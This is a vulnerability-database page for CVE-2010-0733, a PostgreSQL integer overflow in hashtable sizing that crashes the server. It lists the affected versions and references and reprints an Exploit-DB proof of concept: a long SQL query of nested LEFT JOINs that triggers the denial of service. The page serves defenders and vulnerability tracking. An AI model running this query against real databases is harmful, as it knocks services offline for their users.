CVE-2010-0733
low
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
4.5
Description
Integer overflow in src/backend/executor/nodeHash.c in PostgreSQL 8.4.1 and earlier, and 8.5 through 8.5alpha2, allows remote authenticated users to cause a denial of service (daemon crash) via a SELECT statement with many LEFT JOIN clauses, related to certain hashtable size calculations.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service
source: https://www.securityfocus.com/bid/38619/info
PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations.
An attacker can exploit this issue to cause the affected application to crash. Due to the nature of this issue, remote code execution may be possible; this has not been confirmed.
SELECT * from B AS alias0 LEFT JOIN BB AS alias1 LEFT JOIN B
AS alias2 LEFT JOIN A AS alias3 LEFT JOIN AA AS alias4 LEFT JOIN B
AS alias5 ON alias4.int_key = alias5.int_key ON alias3.int_key =
alias4.int_key LEFT JOIN AA AS alias6 LEFT JOIN A AS alias7 ON
alias6.int_key = alias7.int_key LEFT JOIN BB AS alias8 ON alias7.int_key
= alias8.int_key ON alias3.int_key = alias8.int_key LEFT JOIN AA AS
alias9 ON alias6.int_key = alias9.int_key ON alias2.int_key =
alias8.int_key LEFT JOIN BB AS alias10 LEFT JOIN AA AS alias11 LEFT
JOIN B AS alias12 ON alias11.int_key = alias12.int_key ON alias10.int_key
= alias11.int_key ON alias9.int_key = alias10.int_key ON alias1.int_key =
alias8.int_key LEFT JOIN BB AS alias13 LEFT JOIN A AS alias14
LEFT JOIN AA AS alias15 LEFT JOIN A AS alias16 ON alias15.int_key =
alias16.int_key LEFT JOIN B AS alias17 ON alias15.int_key =
alias17.int_key ON alias14.int_key = alias16.int_key LEFT JOIN AA AS
alias18 ON alias14.int_key = alias18.int_key LEFT JOIN B AS alias19 ON
alias15.int_key = alias19.int_key LEFT JOIN AA AS alias20 ON
alias16.int_key = alias20.int_key ON alias13.int_key = alias19.int_key
LEFT JOIN A AS alias21 ON alias13.int_key = alias21.int_key ON
alias3.int_key = alias17.int_key LEFT JOIN B AS alias22 ON alias7.int_key
= alias22.int_key LEFT JOIN A AS alias23 ON alias20.int_key =
alias23.int_key LEFT JOIN A AS alias24 ON alias14.int_key =
alias24.int_key LEFT JOIN BB AS alias25 LEFT JOIN BB AS alias26 ON
alias25.int_key = alias26.int_key LEFT JOIN A AS alias27 LEFT JOIN
A AS alias28 ON alias27.int_key = alias28.int_key LEFT JOIN B AS alias29
LEFT JOIN BB AS alias30 LEFT JOIN B AS alias31 LEFT JOIN A AS
alias32 LEFT JOIN B AS alias33 ON alias32.int_key = alias33.int_key LEFT
JOIN A AS alias34 ON alias32.int_key = alias34.int_key ON alias31.int_key
= alias33.int_key ON alias30.int_key = alias33.int_key ON alias29.int_key
= alias34.int_key ON alias27.int_key = alias34.int_key LEFT JOIN AA AS
alias35 LEFT JOIN A AS alias36 ON alias35.int_key = alias36.int_key ON
alias34.int_key = alias36.int_key LEFT JOIN A AS alias37 ON
alias33.int_key = alias37.int_key ON alias25.int_key = alias32.int_key
LEFT JOIN A AS alias38 ON alias37.int_key = alias38.int_key ON
alias15.int_key = alias37.int_key ON alias0.int_key = alias9.int_key Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| postgresql | postgresql | {"endIncluding":"8.4.1"} | |
| postgresql | postgresql | 8.0 | |
| postgresql | postgresql | 8.0.0 | |
| postgresql | postgresql | 8.0.1 | |
| postgresql | postgresql | 8.0.2 | |
| postgresql | postgresql | 8.0.3 | |
| postgresql | postgresql | 8.0.4 | |
| postgresql | postgresql | 8.0.5 | |
| postgresql | postgresql | 8.0.6 | |
| postgresql | postgresql | 8.0.7 | |
| postgresql | postgresql | 8.0.8 | |
| postgresql | postgresql | 8.0.9 | |
| postgresql | postgresql | 8.0.10 | |
| postgresql | postgresql | 8.0.11 | |
| postgresql | postgresql | 8.0.12 | |
| postgresql | postgresql | 8.0.13 | |
| postgresql | postgresql | 8.0.14 | |
| postgresql | postgresql | 8.0.15 | |
| postgresql | postgresql | 8.0.16 | |
| postgresql | postgresql | 8.0.17 | |
| postgresql | postgresql | 8.0.18 | |
| postgresql | postgresql | 8.0.19 | |
| postgresql | postgresql | 8.0.20 | |
| postgresql | postgresql | 8.0.21 | |
| postgresql | postgresql | 8.0.22 | |
| postgresql | postgresql | 8.0.23 | |
| postgresql | postgresql | 8.0.24 | |
| postgresql | postgresql | 8.0.317 | |
| postgresql | postgresql | 8.1 | |
| postgresql | postgresql | 8.1.0 | |
| postgresql | postgresql | 8.1.1 | |
| postgresql | postgresql | 8.1.2 | |
| postgresql | postgresql | 8.1.3 | |
| postgresql | postgresql | 8.1.4 | |
| postgresql | postgresql | 8.1.5 | |
| postgresql | postgresql | 8.1.6 | |
| postgresql | postgresql | 8.1.7 | |
| postgresql | postgresql | 8.1.8 | |
| postgresql | postgresql | 8.1.9 | |
| postgresql | postgresql | 8.1.10 | |
| postgresql | postgresql | 8.1.11 | |
| postgresql | postgresql | 8.1.12 | |
| postgresql | postgresql | 8.1.13 | |
| postgresql | postgresql | 8.1.14 | |
| postgresql | postgresql | 8.1.15 | |
| postgresql | postgresql | 8.1.16 | |
| postgresql | postgresql | 8.1.17 | |
| postgresql | postgresql | 8.1.18 | |
| postgresql | postgresql | 8.1.19 | |
| postgresql | postgresql | 8.1.20 | |
| postgresql | postgresql | 8.2 | |
| postgresql | postgresql | 8.2.1 | |
| postgresql | postgresql | 8.2.2 | |
| postgresql | postgresql | 8.2.3 | |
| postgresql | postgresql | 8.2.4 | |
| postgresql | postgresql | 8.2.5 | |
| postgresql | postgresql | 8.2.6 | |
| postgresql | postgresql | 8.2.7 | |
| postgresql | postgresql | 8.2.8 | |
| postgresql | postgresql | 8.2.9 | |
| postgresql | postgresql | 8.2.10 | |
| postgresql | postgresql | 8.2.11 | |
| postgresql | postgresql | 8.2.12 | |
| postgresql | postgresql | 8.2.13 | |
| postgresql | postgresql | 8.2.14 | |
| postgresql | postgresql | 8.2.15 | |
| postgresql | postgresql | 8.2.16 | |
| postgresql | postgresql | 8.3 | |
| postgresql | postgresql | 8.3.1 | |
| postgresql | postgresql | 8.3.2 | |
| postgresql | postgresql | 8.3.3 | |
| postgresql | postgresql | 8.3.4 | |
| postgresql | postgresql | 8.3.5 | |
| postgresql | postgresql | 8.3.6 | |
| postgresql | postgresql | 8.3.7 | |
| postgresql | postgresql | 8.3.8 | |
| postgresql | postgresql | 8.3.9 | |
| postgresql | postgresql | 8.3.10 | |
| postgresql | postgresql | 8.4 | |
| postgresql | postgresql | 8.5 | |
References
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00277.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00287.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00289.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00310.php
- http://git.postgresql.org/gitweb?p=postgresql.git%3Ba=commit%3Bh=64b057e6823655fb6c5d1f24a28f236b94dd6c54
- http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html
- http://secunia.com/advisories/39820
- http://www.openwall.com/lists/oss-security/2010/03/09/2
- http://www.openwall.com/lists/oss-security/2010/03/16/10
- http://www.redhat.com/support/errata/RHSA-2010-0427.html
- http://www.redhat.com/support/errata/RHSA-2010-0428.html
- http://www.redhat.com/support/errata/RHSA-2010-0429.html
- http://www.securityfocus.com/bid/38619
- http://www.vupen.com/english/advisories/2010/1197
- https://bugzilla.redhat.com/show_bug.cgi?id=546621
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10691
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00277.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00287.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00289.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00310.php
- http://git.postgresql.org/gitweb?p=postgresql.git%3Ba=commit%3Bh=64b057e6823655fb6c5d1f24a28f236b94dd6c54
- http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html
- http://secunia.com/advisories/39820
- http://www.openwall.com/lists/oss-security/2010/03/09/2
- http://www.openwall.com/lists/oss-security/2010/03/16/10
CWEs
CWE-189
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.